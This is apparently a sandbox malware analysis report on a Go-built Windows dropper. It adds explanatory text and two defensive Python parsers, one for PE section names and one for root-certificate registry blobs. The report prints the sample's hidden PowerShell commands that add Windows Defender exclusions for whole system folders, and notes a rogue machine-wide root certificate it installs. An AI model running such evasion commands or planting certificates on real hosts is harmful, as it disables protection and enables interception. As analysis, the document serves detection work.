Source: C:\Reka\rapnewsa.exe Section loaded: ntasn1.dll
Source: C:\Reka\rapnewsa.exe Section loaded: ncrypt.dll
Source: C:\Reka\rapnewsa.exe Section loaded: ncryptsslp.dll
Source: C:\Reka\rapnewsa.exe Section loaded: msasn1.dll
Source: C:\Reka\rapnewsa.exe Section loaded: cryptsp.dll
Source: C:\Reka\rapnewsa.exe Section loaded: rsaenh.dll
Source: C:\Reka\rapnewsa.exe Section loaded: cryptbase.dll
Source: C:\Reka\rapnewsa.exe Section loaded: gpapi.dll
Source: C:\Reka\rapnewsa.exe Section loaded: windows.storage.dll
Source: C:\Reka\rapnewsa.exe Section loaded: wldp.dll
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
Source: 1feP5qTCl0.exe Static PE information: Virtual size of .text is bigger than: 0x100000
Source: 1feP5qTCl0.exe Static file information: File size 8077824 > 1048576
Source: 1feP5qTCl0.exe Static PE information: Raw size of .text is bigger than: 0x100000 < 0x267e00
Source: 1feP5qTCl0.exe Static PE information: Raw size of .rdata is bigger than: 0x100000 < 0x276a00
Source: 1feP5qTCl0.exe Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Data Obfuscation

Source: C:\Users\user\Desktop\1feP5qTCl0.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:\Users'"
Source: C:\Users\user\Desktop\1feP5qTCl0.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:\Windows'"
Source: C:\Users\user\Desktop\1feP5qTCl0.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:\Program Files'"
Source: C:\Users\user\Desktop\1feP5qTCl0.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:\Program Files (x86)'"
Source: C:\Users\user\Desktop\1feP5qTCl0.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:\Recovery'"
Source: C:\Users\user\Desktop\1feP5qTCl0.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:\Reka'"
Source: C:\Users\user\Desktop\1feP5qTCl0.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath '%USERPROFILE%\Desktop'"
Source: C:\Reka\rapnewsa.exeCode function: 19_2_00A417E0 GlobalHandle,LoadLibraryA,GetProcAddress,19_2_00A417E0
Source: 1feP5qTCl0.exe; Static PE information: section name: .xdata
Source: 1feP5qTCl0.exe; Static PE information: section name: /4
Source: 1feP5qTCl0.exe; Static PE information: section name: /19
Source: 1feP5qTCl0.exe; Static PE information: section name: /32
Source: 1feP5qTCl0.exe; Static PE information: section name: /46
Source: 1feP5qTCl0.exe; Static PE information: section name: /65
Source: 1feP5qTCl0.exe; Static PE information: section name: /78
Source: 1feP5qTCl0.exe; Static PE information: section name: /90
Source: 1feP5qTCl0.exe; Static PE information: section name: .symtab
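A PE section name field is 8 bytes; a longer name is stored in the COFF string table and the header carries "/<decimal offset>" instead, which is what /4 through /90 are. The string table begins with a 4-byte size field, so the first long name sits at offset 4 and each later offset is the previous one plus that name's length plus its terminating NUL. The gaps here (15, 13, 14, 19, 13, 12) are exactly the lengths of .zdebug_abbrev, .zdebug_line, .zdebug_frame, .debug_gdb_scripts, .zdebug_info and .zdebug_loc, the compressed DWARF sections the Go linker writes in that order, and .symtab is likewise a section only the Go linker emits in PE images, so the sample was almost certainly built with the Go toolchain. That mapping is an inference from the arithmetic, not something the report states. The parser below is an added example, not Joe Sandbox code: it resolves "/N" names through the string table and applies that triage. The image it parses is constructed in memory with only the headers needed, and building it from those names reproduces the report's offsets.

```python
"""Resolve PE section names through the COFF string table and flag the
Go-linker layout (/4 ... /90 plus .symtab).

Added example for this report, not Joe Sandbox code. build_sample_pe()
constructs a minimal image in memory (DOS header, PE signature, COFF header,
section table, string table; no optional header, no section data).
"""
import struct

# Raw names the Go linker produces for its compressed DWARF sections plus
# its symbol-table section; the /N values follow from the name lengths.
GO_LINKER_NAMES = {"/4", "/19", "/32", "/46", "/65", "/78", "/90", ".symtab"}

# Section list modelled on the report: the long names are the ones whose
# lengths reproduce the report's offsets (an inference, see the lead-in).
SAMPLE_SECTIONS = [
    ".text", ".rdata", ".data", ".xdata",
    ".zdebug_abbrev", ".zdebug_line", ".zdebug_frame", ".debug_gdb_scripts",
    ".zdebug_info", ".zdebug_loc", ".zdebug_ranges",
    ".symtab",
]


def parse_sections(data: bytes):
    """Return [(raw_name, resolved_name), ...] for every section header."""
    if data[:2] != b"MZ":
        raise ValueError("missing MZ signature")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    coff = e_lfanew + 4
    (_machine, nsections, _stamp, symtab_off, nsyms,
     opt_size, _flags) = struct.unpack_from("<HHIIIHH", data, coff)
    # The string table immediately follows the COFF symbol table (18-byte symbols).
    strtab_off = symtab_off + nsyms * 18 if symtab_off else 0
    sect_off = coff + 20 + opt_size
    sections = []
    for i in range(nsections):
        start = sect_off + 40 * i
        raw = data[start:start + 8].rstrip(b"\0").decode("ascii", "replace")
        resolved = raw
        if raw.startswith("/") and raw[1:].isdigit() and strtab_off:
            off = strtab_off + int(raw[1:])
            resolved = data[off:data.index(b"\0", off)].decode("ascii", "replace")
        sections.append((raw, resolved))
    return sections


def triage(sections) -> dict:
    """Summarise what the section names say about the build toolchain."""
    raw = {r for r, _ in sections}
    return {
        "long_name_sections": sorted((r for r in raw if r.startswith("/")),
                                     key=lambda s: int(s[1:])),
        "has_symtab": ".symtab" in raw,
        "go_linker_layout": GO_LINKER_NAMES <= raw,
        "resolved": {r: n for r, n in sections if r != n},
    }


def build_sample_pe(section_names) -> bytes:
    """Constructed minimal PE whose section table and string table are real."""
    strtab = bytearray(4)              # leading DWORD = total table size, patched below
    headers = bytearray()
    for name in section_names:
        if len(name) > 8:
            raw = b"/%d" % len(strtab)  # offset of this name within the string table
            strtab += name.encode("ascii") + b"\0"
        else:
            raw = name.encode("ascii")
        headers += raw.ljust(8, b"\0") + bytes(32)  # rest of IMAGE_SECTION_HEADER zeroed
    struct.pack_into("<I", strtab, 0, len(strtab))
    e_lfanew = 0x40
    dos = b"MZ" + bytes(58) + struct.pack("<I", e_lfanew)
    coff_off = e_lfanew + 4
    symtab_off = coff_off + 20 + len(headers)   # zero symbols, so the string table starts here
    coff = struct.pack("<HHIIIHH", 0x8664, len(section_names), 0, symtab_off, 0, 0, 0x22)
    return dos + b"PE\0\0" + coff + bytes(headers) + bytes(strtab)


if __name__ == "__main__":
    secs = parse_sections(build_sample_pe(SAMPLE_SECTIONS))
    for raw, name in secs:
        print(f"{raw:8} -> {name}")
    print(triage(secs))
```

For a real file call parse_sections(open(path, "rb").read()). A Go binary linked with -ldflags=-w carries no DWARF, so the /N entries disappear and only .symtab remains; treat the full set as a strong hint about the toolchain, not as proof.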

Persistence and Installation Behavior

Source: C:\Users\user\Desktop\1feP5qTCl0.exe; Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob (reported twice)
Source: C:\Users\user\Desktop\1feP5qTCl0.exe; File created: C:\Reka\rapnewsa.exe
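The registry path above says what happened: a certificate was written to the machine-wide Root store (not the per-user one), and the key name 3F728A35DE52B2C8994A4FB101A03B95E87B06C8 is its SHA-1 thumbprint. Anything chaining to that certificate, whether a TLS endpoint the sample proxies traffic through or a signed second-stage binary, is now trusted by every account on the host. The Blob value is CryptoAPI's serialized-property format: a sequence of records, each a DWORD property id, a DWORD reserved field equal to 1, a DWORD length and the data, with the DER certificate in property 32 (CERT_CERT_PROP_ID) and its SHA-1 in property 3 (CERT_SHA1_HASH_PROP_ID). The code below is an added example, not part of this report: it parses that layout, pulls out the DER so it can be written to a .cer and inspected, and checks that both the key name and the stored hash match the SHA-1 of the certificate actually embedded, which is how a hand-written registry entry gives itself away. The blob it parses is constructed, and its certificate payload is a placeholder DER wrapper rather than a real certificate.

```python
"""Parse the per-certificate Blob value Windows keeps in the registry
(SystemCertificates, one key per store, one subkey per SHA-1 thumbprint),
recover the DER certificate and check the thumbprint against it.

Added example for this report, not Joe Sandbox code. The blob parsed at the
bottom is constructed, and its certificate payload is placeholder DER
(a SEQUENCE around filler bytes), not a real X.509 certificate.
"""
import hashlib
import struct

CERT_SHA1_HASH_PROP_ID = 3
CERT_FRIENDLY_NAME_PROP_ID = 11
CERT_CERT_PROP_ID = 32
PROP_NAMES = {
    2: "CERT_KEY_PROV_INFO_PROP_ID", 3: "CERT_SHA1_HASH_PROP_ID",
    4: "CERT_MD5_HASH_PROP_ID", 11: "CERT_FRIENDLY_NAME_PROP_ID",
    20: "CERT_KEY_IDENTIFIER_PROP_ID", 32: "CERT_CERT_PROP_ID",
}


def parse_cert_blob(blob: bytes) -> dict:
    """Split the blob into {property_id: data}.
    Each record is DWORD id, DWORD reserved (always 1), DWORD length, data."""
    props, off = {}, 0
    while off + 12 <= len(blob):
        prop_id, reserved, length = struct.unpack_from("<III", blob, off)
        off += 12
        if reserved != 1 or off + length > len(blob):
            raise ValueError(f"malformed property record at offset {off - 12}")
        props[prop_id] = blob[off:off + length]
        off += length
    if off != len(blob):
        raise ValueError("trailing bytes after the last property record")
    return props


def verify_root_entry(key_name: str, blob: bytes) -> dict:
    """Compare the registry key name and the stored SHA-1 property with the
    SHA-1 of the certificate actually embedded in the blob."""
    props = parse_cert_blob(blob)
    der = props.get(CERT_CERT_PROP_ID)
    if der is None:
        raise ValueError("blob carries no CERT_CERT_PROP_ID (32) record")
    actual = hashlib.sha1(der).hexdigest().upper()
    stored = props.get(CERT_SHA1_HASH_PROP_ID, b"").hex().upper()
    friendly = props.get(CERT_FRIENDLY_NAME_PROP_ID, b"").decode("utf-16-le").rstrip("\0")
    return {
        "sha1": actual,
        "key_name_matches_cert": actual == key_name.upper(),
        "stored_hash_matches_cert": stored == actual,
        "der": der,                      # write this to a .cer file to inspect it
        "friendly_name": friendly or None,
        "properties": [PROP_NAMES.get(p, f"prop_{p}") for p in props],
    }


def build_sample_blob(der: bytes, friendly: str = "", wrong_hash: bool = False) -> bytes:
    """Constructed blob in the same record format; wrong_hash stores a bogus
    SHA-1 so the consistency check has something to catch."""
    def record(prop_id: int, data: bytes) -> bytes:
        return struct.pack("<III", prop_id, 1, len(data)) + data
    sha1 = bytes(20) if wrong_hash else hashlib.sha1(der).digest()
    out = record(CERT_SHA1_HASH_PROP_ID, sha1)
    if friendly:
        out += record(CERT_FRIENDLY_NAME_PROP_ID, friendly.encode("utf-16-le") + b"\0\0")
    return out + record(CERT_CERT_PROP_ID, der)


# Placeholder certificate: DER SEQUENCE header plus 16 filler bytes. Not a real cert.
SAMPLE_DER = b"\x30\x82\x00\x10" + b"\xAA" * 16
SAMPLE_KEY_NAME = hashlib.sha1(SAMPLE_DER).hexdigest().upper()
REPORT_KEY_NAME = "3F728A35DE52B2C8994A4FB101A03B95E87B06C8"  # thumbprint from the report

if __name__ == "__main__":
    good = verify_root_entry(SAMPLE_KEY_NAME, build_sample_blob(SAMPLE_DER, "Constructed Test Root"))
    bad = verify_root_entry(REPORT_KEY_NAME, build_sample_blob(SAMPLE_DER, wrong_hash=True))
    for label, r in (("consistent", good), ("mismatched", bad)):
        print(label, r["sha1"], r["key_name_matches_cert"], r["stored_hash_matches_cert"], r["properties"])
```

On a live host, read the Blob value from the subkey named after the thumbprint under HKLM\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates and pass the bytes to verify_root_entry; comparing the whole ROOT store against a known-good baseline (or the Microsoft CTL) is what actually surfaces an unexpected entry like this one.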

Hooking and other Techniques for Hiding and Protection

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 (28 occurrences in the original listing)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1 (21 occurrences in the original listing)
Source: C:\Users\user\Desktop\1feP5qTCl0.exe; Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT
Source: C:\Users\user\Desktop\1feP5qTCl0.exe; Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate
Source: C:\Users\user\Desktop\1feP5qTCl0.exe; Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
Source: C:\Users\user\Desktop\1feP5qTCl0.exe; Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob
Source: C:\Users\user\Desktop\1feP5qTCl0.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\conhost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
